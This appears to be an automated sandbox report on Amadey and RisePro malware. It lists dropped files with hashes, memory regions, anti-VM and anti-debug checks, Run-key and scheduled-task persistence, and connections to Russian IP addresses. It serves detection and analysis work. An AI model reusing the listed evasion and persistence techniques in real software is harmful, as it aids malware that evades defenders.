| SHA1 | 2584e6496d048068f61ac72f5c08b54ad08627c3 |
| SHA256 | 2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc |
| SHA512 | b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d |
memory/5048-487-0x0000000007550000-0x0000000007712000-memory.dmp
memory/5048-488-0x0000000007C50000-0x000000000817C000-memory.dmp
C:\Users\Admin\Pictures\KZZeU9AHXMfM49m0CgST8jIQ.exe
| MD5 | 74311dfcc6a25a6c0a846ed016c2916c |
| SHA1 | afb35f0bf0c327796eb209072fac8f1be34479b3 |
| SHA256 | 5efcdfbb03441f46b546f94be11687b51f93b049c6e94879536a9b31048c5073 |
| SHA512 | 2e6f5cc116fb7f44f0b1dcd2c02f92bdbe40de9e8065721bbb8754dccd0c24dc713fc07dee33eff2c7b1cecf2d15b61537b3bb22eb766ca188aaaa9c299d21e4 |
C:\Users\Admin\Pictures\kCFEMhAQIuBTEcADzWlIq9oG.exe
| MD5 | a820588766207bdd82ac79ff4f553b6f |
| SHA1 | 2e3985344dddfc9c88d5f5a22bdfa932259332d3 |
| SHA256 | 0209678b3cb7b5d67d9a73fbdce851148909ecdba3b8766d5a59eca4cb848e05 |
| SHA512 | cc052c5021ec0f18e3b24701bdf9425ffdee67645eadab5f27f8dd073eb4711a824e77c83b39cb2d2a0de44733bd09504aba466120393bb63001c8d80aa76656 |
C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe
| MD5 | 73309cc961f9645c1c2562ffcdc2dab1 |
| SHA1 | 6a8545c08c931e016198c80b304ade1c1e8f7a17 |
| SHA256 | 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298 |
| SHA512 | 89858a407acbc7c13a4bd40031abd6803c311d381a37702631b1739d9f0e67c6afae50e6d1188b54a7d0e1ddfbcb6857b68f8f44cad3b10b1b31b53f1b676914 |
C:\Users\Admin\Pictures\vRfmkKE5YjUZoqiydosnC5gL.exe
| MD5 | 8a7d6319e561fd2b8cac68be99886a3d |
| SHA1 | 47c30cfcb842cc27dba7eaee4b3e621046104f58 |
| SHA256 | 9f35f50b14e558214c841d8b734a152374efd80cb2f1a23fe0d27397377e0b0b |
| SHA512 | 1d9408d6fc1a2119fa641c2b4f0771ca5923e0026237e3fda888d4008861f2a21bfeeaf311ba9a09aa759878b2f331624ac25dad46d12cede7192686a8aa993f |
C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe
| MD5 | ffada57f998ed6a72b6ba2f072d2690a |
| SHA1 | 6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f |
| SHA256 | 677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12 |
| SHA512 | 1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f |
memory/4308-586-0x0000000000DF0000-0x0000000000E28000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
| MD5 | a483da8b27289fc9cc49d6b17e61cbf6 |
| SHA1 | 2d4a5a704c2ff332df6436b7bcd16365f03c2a97 |
| SHA256 | f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911 |
| SHA512 | e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9 |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 5cdfc4b9de66db60219b702987b6884f |
| SHA1 | 3f664159cd6af48abc3f4c4a2d0ec16ff715b208 |
| SHA256 | 9a52a5e9dcfcc59699cab7a8777c114d2b9685e68b00502c0bfb28b42ef3321d |
| SHA512 | 3c14da8a340736a697b4b2188b1b250b7328278a11e3483cc684247a2c10fc2b69435013e2704275dae319d992a048ff66a074065e91e9a2f65cfbd24a874d1d |
memory/3632-640-0x00000196FB180000-0x00000196FB1A2000-memory.dmp
memory/2696-637-0x00000000003E0000-0x000000000088B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvsayrvv.dcl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\Pictures\7Hswff1vVcJEkZx6ERuw0xeI.exe
| MD5 | 3013de825f04f7153a1c5f62b0966e04 |
| SHA1 | cb128b19930a54aec54188c48070a38ebce4f0e8 |
| SHA256 | 4db334099ad5948d7cf43c16d92e62d2052dd98d8b3457781f848479cbc8ccfb |
| SHA512 | f117530c2f7f810159bd30e2a95b5ff31725269348fef4c8e1db8e2ed355a3763d0cefa61b505036d5cc0ab2d2c37687df4c392eb67ed977e5849ac370f2f8d7 |
memory/2980-654-0x0000000140000000-0x0000000140A55000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
C:\Users\Admin\Pictures\qTEX7szWEBVUj0CUAxUkEmMV.exe
| MD5 | 5cc472dcd66120aed74de36341bfd75a |
| SHA1 | 1dfc4d42da90fe070d4474ddd7fa7b6f6ffa97ab |
| SHA256 | 958dd14c90b1c73852f926608f212377aa3a36666c04024f97c20deb375e9773 |
| SHA512 | b5cf358d95ec9a6cca81d2e9c23f0ede93ab94963bb5c626f4e6233a06cedae63b73dd81d2455acb29b003c3b4e2f54da6010daebc4639a3dcc54314d4fe4f81 |
memory/3652-682-0x0000000000250000-0x00000000008BE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS3C1A.tmp\Install.exe
| MD5 | 220a02a940078153b4063f42f206087b |
| SHA1 | 02fc647d857573a253a1ab796d162244eb179315 |
| SHA256 | 7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60 |
| SHA512 | 42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa |
memory/1372-702-0x0000000000260000-0x00000000008CE000-memory.dmp
memory/4984-708-0x0000000000A40000-0x0000000000A76000-memory.dmp
memory/4984-709-0x0000000004C10000-0x0000000005238000-memory.dmp
memory/4984-710-0x0000000004BC0000-0x0000000004BE2000-memory.dmp
memory/4984-716-0x0000000005370000-0x00000000053D6000-memory.dmp
memory/4984-721-0x0000000005720000-0x0000000005A74000-memory.dmp
memory/4984-722-0x00000000056F0000-0x000000000570E000-memory.dmp
memory/4984-730-0x0000000005C00000-0x0000000005C4C000-memory.dmp
C:\Users\Admin\Pictures\gFsnisT4V524tJNo2DqUq6HG.exe
| MD5 | 3d233051324a244029b80824692b2ad4 |
| SHA1 | a053ebdacbd5db447c35df6c4c1686920593ef96 |
| SHA256 | fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84 |
| SHA512 | 7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949 |
memory/5516-760-0x00000000003E0000-0x000000000088B000-memory.dmp
memory/5508-769-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/5516-771-0x00000000003E0000-0x000000000088B000-memory.dmp
memory/5936-773-0x0000000000260000-0x00000000008CE000-memory.dmp
memory/4280-785-0x0000000000260000-0x00000000008CE000-memory.dmp
memory/5840-795-0x0000000006FC0000-0x0000000007056000-memory.dmp
memory/5840-796-0x0000000006190000-0x00000000061AA000-memory.dmp
memory/5840-797-0x00000000061E0000-0x0000000006202000-memory.dmp
memory/6140-897-0x0000021850830000-0x000002185084C000-memory.dmp
memory/6140-898-0x0000021850850000-0x0000021850905000-memory.dmp
memory/6140-901-0x00000218505E0000-0x00000218505EA000-memory.dmp
memory/6140-911-0x0000021850A70000-0x0000021850A8C000-memory.dmp
memory/6140-912-0x0000021850A50000-0x0000021850A5A000-memory.dmp
memory/6140-913-0x0000021850AB0000-0x0000021850ACA000-memory.dmp
memory/6140-914-0x0000021850A60000-0x0000021850A68000-memory.dmp
memory/6140-915-0x0000021850A90000-0x0000021850A96000-memory.dmp
memory/6140-916-0x0000021850AA0000-0x0000021850AAA000-memory.dmp
memory/6052-944-0x00000206D4850000-0x00000206D4905000-memory.dmp
memory/2980-1002-0x0000000140000000-0x0000000140A55000-memory.dmp
memory/4308-1012-0x000000001CC90000-0x000000001CC9A000-memory.dmp
memory/4308-1017-0x000000001E4B0000-0x000000001E4BE000-memory.dmp
memory/4308-1016-0x000000001E190000-0x000000001E2B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpDC80.tmp.dat
| MD5 | 9df444e0de734921d4d96deeeac4b16e |
| SHA1 | 31542622ecf896b93d830e21595091aef8742901 |
| SHA256 | 1d324d34d58165aca7dbf057a7417457776b4e805d60182401a9275fb7920900 |
| SHA512 | 2de6a0ac09b7a1a21cda31e49c072b097ca1959814c535920a099a9df87e993ba2dfd6cebcb8ec2110efca385bb618f771258575a06736afcfd6cd40a8e1a957 |
C:\Users\Admin\AppData\Local\Temp\tmpDF75.tmp.dat
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\tmpDF65.tmp.dat
| MD5 | b01182fd0bcfecd25f0378b6ddd50714 |
| SHA1 | faf0abd8ccde904e4ec90d216f9dada2c3a046d3 |
| SHA256 | 921d4d81de816c9f7add02a5c5dc28209959a2ce1bdd64eff6675a5cdbd90a55 |
| SHA512 | a409fe0c1fbbcc158d47f6f727446ddf754b99ec235715f5f03b66a4f0c91b93c8bbd9e7ab235ed65e9b0abdd4bf2899dd3e5ec4afa8f45822e6f3dbc9d1bd7d |
memory/4308-1058-0x000000001E5C0000-0x000000001E910000-memory.dmp
memory/3652-1090-0x0000000000250000-0x00000000008BE000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-13 19:23
Reported
2024-05-13 19:26
Platform
win11-20240426-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Amadey
RisePro
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\1000006002\698639580a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\1000006002\698639580a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\1000006002\698639580a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\1000006002\698639580a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\698639580a.exe = "C:\\Users\\Admin\\1000006002\\698639580a.exe" | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\1000006002\698639580a.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\explorku.job | C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe | N/A |
| File created | C:\Windows\Tasks\axplons.job | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe
"C:\Users\Admin\AppData\Local\Temp\fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9.exe"
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
C:\Users\Admin\1000006002\698639580a.exe
"C:\Users\Admin\1000006002\698639580a.exe"
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
Network
| Country | Destination | Domain | Proto |
| RU | 5.42.96.141:80 | 5.42.96.141 | tcp |
| RU | 5.42.96.7:80 | 5.42.96.7 | tcp |
| US | 8.8.8.8:53 | 141.96.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.96.42.5.in-addr.arpa | udp |
| RU | 5.42.96.7:80 | 5.42.96.7 | tcp |
Files
memory/772-3-0x0000000000F80000-0x00000000014D2000-memory.dmp
memory/772-0-0x0000000000F80000-0x00000000014D2000-memory.dmp
memory/772-7-0x0000000000F80000-0x00000000014D2000-memory.dmp
memory/772-8-0x0000000000F80000-0x00000000014D2000-memory.dmp
memory/772-6-0x0000000000F80000-0x00000000014D2000-memory.dmp
memory/772-4-0x0000000000F80000-0x00000000014D2000-memory.dmp
memory/772-2-0x0000000000F80000-0x00000000014D2000-memory.dmp
memory/772-5-0x0000000000F80000-0x00000000014D2000-memory.dmp
memory/772-1-0x0000000000F80000-0x00000000014D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
| MD5 | 031c0d7f77970ec5d4bcfb75d8f06e00 |
| SHA1 | 836e672c8a8c7ac88ef21948fcbc69ac0dec53ba |
| SHA256 | fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9 |
| SHA512 | 0c8ddfcdfde3d28043cc4eca439f45694316f4d52ef43a2d08dd3a46b399b37ea3b91b0f439e6d90f98dd5b3e5c204a2f21bb0230d55fcf9603d554987fa4c3e |
memory/772-21-0x0000000000F80000-0x00000000014D2000-memory.dmp
memory/1852-23-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/1852-20-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/1852-26-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/1852-24-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/1852-27-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/1852-29-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/1852-30-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/1852-25-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/1852-28-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/4848-38-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/4848-41-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/4848-43-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/4848-42-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/4848-40-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/4848-39-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/4848-36-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/4848-35-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/4848-37-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/1852-34-0x0000000000EC0000-0x0000000001412000-memory.dmp
memory/4848-45-0x0000000000EC0000-0x0000000001412000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
| MD5 | acbf3415c84289ab9808d2d7e5f8743d |
| SHA1 | ca13a555e3f8f57e563bdd7fde57530db305c250 |
| SHA256 | 7ae5191fde1f83494346e67aa99d2ca955ae31601593ad491b89baff9ce62098 |
| SHA512 | ddb4dbd87993bc4618a893c2d65deb8817c60c5d2c884f06eb55981c0d558ded5e1b719ea5c89229abec3b0c2c11d938440cc6b3e88b2dbabae0d42a7bae23c2 |
memory/1400-61-0x0000000000190000-0x000000000063B000-memory.dmp
memory/1400-74-0x0000000000190000-0x000000000063B000-memory.dmp
memory/1988-75-0x0000000000DF0000-0x000000000129B000-memory.dmp
C:\Users\Admin\1000006002\698639580a.exe
| MD5 | 65aeca0a2e005df5dc7f08a0d71cf7c3 |
| SHA1 | f932daafec4916d1bb9b8e3481c27f09bd29057d |
| SHA256 | 393c1152e4a519a761924675212b12c9ff6d4e4f0d4cd9defa08ed99c349f353 |
| SHA512 | 85393889a4efbd87123c0d14c0bd05335fcf9eb46fa590ca5900e1adf2882bc1cc68bf329561b75b167327f74785a01222b47ee74f6f4d805187275c4ece1d80 |
memory/4620-94-0x0000000000800000-0x0000000000E2B000-memory.dmp
memory/4620-95-0x0000000000800000-0x0000000000E2B000-memory.dmp
memory/4620-96-0x0000000000800000-0x0000000000E2B000-memory.dmp
memory/4620-98-0x0000000000800000-0x0000000000E2B000-memory.dmp
memory/4620-97-0x0000000000800000-0x0000000000E2B000-memory.dmp
